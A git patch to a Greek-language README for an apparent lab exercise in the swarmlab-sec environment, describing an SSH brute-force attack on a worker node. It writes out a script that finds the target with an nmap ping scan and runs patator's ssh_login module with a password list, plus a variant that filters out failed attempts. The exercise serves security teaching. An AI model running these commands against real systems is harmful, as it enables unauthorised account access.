From a46fb2c68c83465706267798d7856c7444900c76 Mon Sep 17 00:00:00 2001 From: AndreasNefeli Date: Sun, 24 Jan 2021 12:56:59 +0000 Subject: [PATCH] Update '2. SSH Brute Force/README.md' --- 2. SSH Brute Force/README.md | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/2. SSH Brute Force/README.md b/2. SSH Brute Force/README.md index cb481fa..511d35b 100644 --- a/2. SSH Brute Force/README.md +++ b/2. SSH Brute Force/README.md @@ -12,27 +12,33 @@ 4. git clone https://github.com/lanjelot/patator.git** _______________________________________________________________________________________ Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση. -**1. sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login** +**sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login** + +**Σημείωση:** Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών: +**1. python patator.py +2. python patator.py ssh_login** (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.) + Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. -**2. ./master.sh** +**./master.sh** **master.sh** * H my_ip περιέχει την ip διεύθυνση του master. - **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** + **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** *H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε. - **network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** + **network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** * Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**. -**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** + **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** +* Με την ακόλουθη εντολή εκτελείτε η επίθεση. -**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** + **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** #emfanizei kai tis apotyximenes prospatheies #patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' #emfanizei mono tin epithesi ston kwdiko pou isxuei